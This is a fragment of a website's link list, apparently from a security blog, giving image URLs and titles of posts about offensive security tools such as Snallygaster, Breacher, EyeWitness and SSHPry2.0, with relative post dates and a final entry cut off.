* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/sna-768x373-1-90x90.png Offensive Security Tool: Snallygaster1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-14_115500-90x90.png Offensive Security Tool: Breacher1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-07_124858-90x90.png Offensive Security Tool: EyeWitness2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/Selection_017-90x90.png Offensive Security Tool: SSHPry2.02 months ago
* https://[...]